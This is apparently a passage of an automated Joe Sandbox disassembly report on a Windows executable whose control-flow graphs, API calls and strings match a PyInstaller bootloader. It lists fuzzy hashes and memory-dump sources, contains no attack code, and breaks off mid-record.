                                                                                                                                                                                                  control_flow_graph 398 7ff7102c11f0-7ff7102c124d call 7ff7102cb0a0 401 7ff7102c124f-7ff7102c1276 call 7ff7102c25f0 398->401 402 7ff7102c1277-7ff7102c128f call 7ff7102d4170 398->402 407 7ff7102c1291-7ff7102c12a8 call 7ff7102c2760 402->407 408 7ff7102c12ad-7ff7102c12bd call 7ff7102d4170 402->408 413 7ff7102c1409-7ff7102c141e call 7ff7102cad80 call 7ff7102d415c * 2 407->413 414 7ff7102c12bf-7ff7102c12d6 call 7ff7102c2760 408->414 415 7ff7102c12db-7ff7102c12ed 408->415 430 7ff7102c1423-7ff7102c143d 413->430 414->413 416 7ff7102c12f0-7ff7102c1315 call 7ff7102cf6bc 415->416 424 7ff7102c1401 416->424 425 7ff7102c131b-7ff7102c1325 call 7ff7102cf430 416->425 424->413 425->424 431 7ff7102c132b-7ff7102c1337 425->431 432 7ff7102c1340-7ff7102c1368 call 7ff7102c94e0 431->432 435 7ff7102c13e6-7ff7102c13fc call 7ff7102c25f0 432->435 436 7ff7102c136a-7ff7102c136d 432->436 435->424 437 7ff7102c13e1 436->437 438 7ff7102c136f-7ff7102c1379 436->438 437->435 440 7ff7102c13a4-7ff7102c13a7 438->440 441 7ff7102c137b-7ff7102c1389 call 7ff7102cfdfc 438->441 442 7ff7102c13ba-7ff7102c13bf 440->442 443 7ff7102c13a9-7ff7102c13b7 call 7ff7102e9140 440->443 447 7ff7102c138e-7ff7102c1391 441->447 442->432 446 7ff7102c13c5-7ff7102c13c8 442->446 443->442 449 7ff7102c13ca-7ff7102c13cd 446->449 450 7ff7102c13dc-7ff7102c13df 446->450 451 7ff7102c139f-7ff7102c13a2 447->451 452 7ff7102c1393-7ff7102c139d call 7ff7102cf430 447->452 449->435 454 7ff7102c13cf-7ff7102c13d7 449->454 450->424 451->435 452->442 452->451 454->416
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                  • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                  • API String ID: 2030045667-2813020118
                                                                                                                                                                                                  • Opcode ID: 4edf75dc8b51e423b9695cf624432c5f54ad6178f805759dee0951bd1d48095d
                                                                                                                                                                                                  • Instruction ID: 81832dde202d38e4d4f7da31bc0e9f683556378acd50989647e193954972ffb4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4edf75dc8b51e423b9695cf624432c5f54ad6178f805759dee0951bd1d48095d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9351F622A18E8281EA64BB11A5413BAEA51FF867A4FD40135ED4D47BD5EF3CF449C720

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF7102DE3BA,?,?,-00000018,00007FF7102DA063,?,?,?,00007FF7102D9F5A,?,?,?,00007FF7102D524E), ref: 00007FF7102DE19C
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF7102DE3BA,?,?,-00000018,00007FF7102DA063,?,?,?,00007FF7102D9F5A,?,?,?,00007FF7102D524E), ref: 00007FF7102DE1A8
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                  • API String ID: 3013587201-537541572
                                                                                                                                                                                                  • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                  • Instruction ID: 31a7087208fb00d03ff0818f0388ba8a4a6613ce3abad4646cabbebef260a9a0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E141B222B19E0292FE16BB16A940676AA92BF45BB0FC94135DD1D57784EE3CFC0D8360

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF7102C3834), ref: 00007FF7102C7CE4
                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF7102C3834), ref: 00007FF7102C7D2C
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C7E10: GetEnvironmentVariableW.KERNEL32(00007FF7102C365F), ref: 00007FF7102C7E47
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7102C7E69
                                                                                                                                                                                                    • Part of subcall function 00007FF7102D7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7102D7561
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C26C0: MessageBoxW.USER32 ref: 00007FF7102C2736
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                  • API String ID: 740614611-1339014028
                                                                                                                                                                                                  • Opcode ID: e203fb9b2ed022230aea9b70073d79c64569b0fcacf7335b186391ffe1e7d089
                                                                                                                                                                                                  • Instruction ID: 72cade6ba44692d7d0f2e993341f85e6715edf429befd0392613975a37fa264d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e203fb9b2ed022230aea9b70073d79c64569b0fcacf7335b186391ffe1e7d089
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8041AF12A29E4341EA20BB25AA552F9DA55BF45BB0FC04031EE0E57796EE3CF90C8720

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 572 7ff7102dad6c-7ff7102dad92 573 7ff7102dad94-7ff7102dada8 call 7ff7102d43d4 call 7ff7102d43f4 572->573 574 7ff7102dadad-7ff7102dadb1 572->574 590 7ff7102db19e 573->590 576 7ff7102db187-7ff7102db193 call 7ff7102d43d4 call 7ff7102d43f4 574->576 577 7ff7102dadb7-7ff7102dadbe 574->577 596 7ff7102db199 call 7ff7102d9bf0 576->596 577->576 579 7ff7102dadc4-7ff7102dadf2 577->579 579->576 582 7ff7102dadf8-7ff7102dadff 579->582 585 7ff7102dae01-7ff7102dae13 call 7ff7102d43d4 call 7ff7102d43f4 582->585 586 7ff7102dae18-7ff7102dae1b 582->586 585->596 588 7ff7102db183-7ff7102db185 586->588 589 7ff7102dae21-7ff7102dae27 586->589 593 7ff7102db1a1-7ff7102db1b8 588->593 589->588 594 7ff7102dae2d-7ff7102dae30 589->594 590->593 594->585 597 7ff7102dae32-7ff7102dae57 594->597 596->590 600 7ff7102dae8a-7ff7102dae91 597->600 601 7ff7102dae59-7ff7102dae5b 597->601 605 7ff7102dae93-7ff7102daebb call 7ff7102dc90c call 7ff7102d9c58 * 2 600->605 606 7ff7102dae66-7ff7102dae7d call 7ff7102d43d4 call 7ff7102d43f4 call 7ff7102d9bf0 600->606 603 7ff7102dae82-7ff7102dae88 601->603 604 7ff7102dae5d-7ff7102dae64 601->604 609 7ff7102daf08-7ff7102daf1f 603->609 604->603 604->606 633 7ff7102daebd-7ff7102daed3 call 7ff7102d43f4 call 7ff7102d43d4 605->633 634 7ff7102daed8-7ff7102daf03 call 7ff7102db594 605->634 637 7ff7102db010 606->637 612 7ff7102daf21-7ff7102daf29 609->612 613 7ff7102daf9a-7ff7102dafa4 call 7ff7102e2c2c 609->613 612->613 614 7ff7102daf2b-7ff7102daf2d 612->614 625 7ff7102db02e 613->625 626 7ff7102dafaa-7ff7102dafbf 613->626 614->613 618 7ff7102daf2f-7ff7102daf45 614->618 618->613 622 7ff7102daf47-7ff7102daf53 618->622 622->613 627 7ff7102daf55-7ff7102daf57 622->627 629 7ff7102db033-7ff7102db053 ReadFile 625->629 626->625 631 7ff7102dafc1-7ff7102dafd3 GetConsoleMode 626->631 627->613 632 7ff7102daf59-7ff7102daf71 627->632 635 7ff7102db14d-7ff7102db156 GetLastError 629->635 636 7ff7102db059-7ff7102db061 629->636 631->625 638 7ff7102dafd5-7ff7102dafdd 631->638 632->613 642 7ff7102daf73-7ff7102daf7f 632->642 633->637 634->609 639 7ff7102db173-7ff7102db176 635->639 640 7ff7102db158-7ff7102db16e call 7ff7102d43f4 call 7ff7102d43d4 635->640 636->635 644 7ff7102db067 636->644 641 7ff7102db013-7ff7102db01d call 7ff7102d9c58 637->641 638->629 646 7ff7102dafdf-7ff7102db001 ReadConsoleW 638->646 650 7ff7102db17c-7ff7102db17e 639->650 651 7ff7102db009-7ff7102db00b call 7ff7102d4368 639->651 640->637 641->593 642->613 649 7ff7102daf81-7ff7102daf83 642->649 653 7ff7102db06e-7ff7102db083 644->653 655 7ff7102db003 GetLastError 646->655 656 7ff7102db022-7ff7102db02c 646->656 649->613 660 7ff7102daf85-7ff7102daf95 649->660 650->641 651->637 653->641 662 7ff7102db085-7ff7102db090 653->662 655->651 656->653 660->613 665 7ff7102db092-7ff7102db0ab call 7ff7102da984 662->665 666 7ff7102db0b7-7ff7102db0bf 662->666 674 7ff7102db0b0-7ff7102db0b2 665->674 667 7ff7102db0c1-7ff7102db0d3 666->667 668 7ff7102db13b-7ff7102db148 call 7ff7102da7c4 666->668 671 7ff7102db0d5 667->671 672 7ff7102db12e-7ff7102db136 667->672 668->674 675 7ff7102db0da-7ff7102db0e1 671->675 672->641 674->641 677 7ff7102db0e3-7ff7102db0e7 675->677 678 7ff7102db11d-7ff7102db128 675->678 679 7ff7102db103 677->679 680 7ff7102db0e9-7ff7102db0f0 677->680 678->672 682 7ff7102db109-7ff7102db119 679->682 680->679 681 7ff7102db0f2-7ff7102db0f6 680->681 681->679 683 7ff7102db0f8-7ff7102db101 681->683 682->675 684 7ff7102db11b 682->684 683->682 684->672
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                                                                                  • Instruction ID: c45be9521118ba2c1801180bd2584de96bd1d1b0d13ee4ad47e8844ab2311a14
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4C1D323A0CE8791EA62AB1494606BEBF51FB90BA0FD54135EA5D03791DE7DFC4D8320

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 995526605-0
                                                                                                                                                                                                  • Opcode ID: 62e4819b0c80cd137060bb94e6a3fe70b8e549ab62dcd95e051829f5e08db428
                                                                                                                                                                                                  • Instruction ID: 62abb6dec056d0bf7922310e62cf80b4909010ec0fda0fd966d5bb330f58853b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62e4819b0c80cd137060bb94e6a3fe70b8e549ab62dcd95e051829f5e08db428
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31215121A0CE4342EB10AB55E94426AEBA1FF957B4F900635EA6D43BE4DF7CF5488720

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,00007FF7102C3534), ref: 00007FF7102C3411
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C29E0: GetLastError.KERNEL32(?,?,?,00007FF7102C342E,?,00007FF7102C3534), ref: 00007FF7102C2A14
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C29E0: FormatMessageW.KERNEL32(?,?,?,00007FF7102C342E), ref: 00007FF7102C2A7D
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C29E0: MessageBoxW.USER32 ref: 00007FF7102C2ACF
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                                  • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                  • API String ID: 517058245-2863816727
                                                                                                                                                                                                  • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                  • Instruction ID: d557c5c0d64bfbbfc7f67b05e50e1fbacd52890b3d961a2390a3753e35a45986
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A121A121B28D4281FA35BB24E9003BA9A50BF483B4FC04136D65D867D6EE2CF60D8730

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C7B50: GetCurrentProcess.KERNEL32 ref: 00007FF7102C7B70
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C7B50: OpenProcessToken.ADVAPI32 ref: 00007FF7102C7B83
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C7B50: GetTokenInformation.KERNELBASE ref: 00007FF7102C7BA8
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C7B50: GetLastError.KERNEL32 ref: 00007FF7102C7BB2
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C7B50: GetTokenInformation.KERNELBASE ref: 00007FF7102C7BF2
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7102C7C0E
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C7B50: CloseHandle.KERNEL32 ref: 00007FF7102C7C26
                                                                                                                                                                                                  • LocalFree.KERNEL32(?,00007FF7102C3814), ref: 00007FF7102C848C
                                                                                                                                                                                                  • LocalFree.KERNEL32(?,00007FF7102C3814), ref: 00007FF7102C8495
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                  • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                  • API String ID: 6828938-1529539262
                                                                                                                                                                                                  • Opcode ID: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
                                                                                                                                                                                                  • Instruction ID: c691b8a545713cfdc8bc3b1c3d3eb2e0949054d96e7363c580c61428885ced00
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25214121A18E4281F654BB10E5152EAAAA5FF847A0FC44035EA4D57796DF3CF84DC760

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 819 7ff7102dc270-7ff7102dc295 820 7ff7102dc563 819->820 821 7ff7102dc29b-7ff7102dc29e 819->821 824 7ff7102dc565-7ff7102dc575 820->824 822 7ff7102dc2a0-7ff7102dc2d2 call 7ff7102d9b24 821->822 823 7ff7102dc2d7-7ff7102dc303 821->823 822->824 826 7ff7102dc305-7ff7102dc30c 823->826 827 7ff7102dc30e-7ff7102dc314 823->827 826->822 826->827 829 7ff7102dc324-7ff7102dc339 call 7ff7102e2c2c 827->829 830 7ff7102dc316-7ff7102dc31f call 7ff7102db630 827->830 834 7ff7102dc453-7ff7102dc45c 829->834 835 7ff7102dc33f-7ff7102dc348 829->835 830->829 837 7ff7102dc4b0-7ff7102dc4d5 WriteFile 834->837 838 7ff7102dc45e-7ff7102dc464 834->838 835->834 836 7ff7102dc34e-7ff7102dc352 835->836 839 7ff7102dc354-7ff7102dc35c call 7ff7102d3ae0 836->839 840 7ff7102dc363-7ff7102dc36e 836->840 841 7ff7102dc4e0 837->841 842 7ff7102dc4d7-7ff7102dc4dd GetLastError 837->842 843 7ff7102dc466-7ff7102dc469 838->843 844 7ff7102dc49c-7ff7102dc4ae call 7ff7102dbd28 838->844 839->840 846 7ff7102dc370-7ff7102dc379 840->846 847 7ff7102dc37f-7ff7102dc394 GetConsoleMode 840->847 849 7ff7102dc4e3 841->849 842->841 850 7ff7102dc46b-7ff7102dc46e 843->850 851 7ff7102dc488-7ff7102dc49a call 7ff7102dbf48 843->851 866 7ff7102dc440-7ff7102dc447 844->866 846->834 846->847 856 7ff7102dc44c 847->856 857 7ff7102dc39a-7ff7102dc3a0 847->857 859 7ff7102dc4e8 849->859 852 7ff7102dc4f4-7ff7102dc4fe 850->852 853 7ff7102dc474-7ff7102dc486 call 7ff7102dbe2c 850->853 851->866 860 7ff7102dc500-7ff7102dc505 852->860 861 7ff7102dc55c-7ff7102dc561 852->861 853->866 856->834 864 7ff7102dc3a6-7ff7102dc3a9 857->864 865 7ff7102dc429-7ff7102dc43b call 7ff7102db8b0 857->865 867 7ff7102dc4ed 859->867 868 7ff7102dc533-7ff7102dc53d 860->868 869 7ff7102dc507-7ff7102dc50a 860->869 861->824 871 7ff7102dc3b4-7ff7102dc3c2 864->871 872 7ff7102dc3ab-7ff7102dc3ae 864->872 865->866 866->859 867->852 876 7ff7102dc544-7ff7102dc553 868->876 877 7ff7102dc53f-7ff7102dc542 868->877 874 7ff7102dc523-7ff7102dc52e call 7ff7102d43b0 869->874 875 7ff7102dc50c-7ff7102dc51b 869->875 878 7ff7102dc3c4 871->878 879 7ff7102dc420-7ff7102dc424 871->879 872->867 872->871 874->868 875->874 876->861 877->820 877->876 881 7ff7102dc3c8-7ff7102dc3df call 7ff7102e2cf8 878->881 879->849 885 7ff7102dc3e1-7ff7102dc3ed 881->885 886 7ff7102dc417-7ff7102dc41d GetLastError 881->886 887 7ff7102dc3ef-7ff7102dc401 call 7ff7102e2cf8 885->887 888 7ff7102dc40c-7ff7102dc413 885->888 886->879 887->886 892 7ff7102dc403-7ff7102dc40a 887->892 888->879 890 7ff7102dc415 888->890 890->881 892->888
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7102DC25B), ref: 00007FF7102DC38C
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7102DC25B), ref: 00007FF7102DC417
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 953036326-0
                                                                                                                                                                                                  • Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                                  • Instruction ID: 6582c0e9de946f9534ec54c12df7264c8b9fbfe730ba3644157abcde8752bdc7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2291C873F08A5685F750EF65945027DAFA0BB04BA8FA44139DE0E67B84DE38F8498720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1279662727-0
                                                                                                                                                                                                  • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
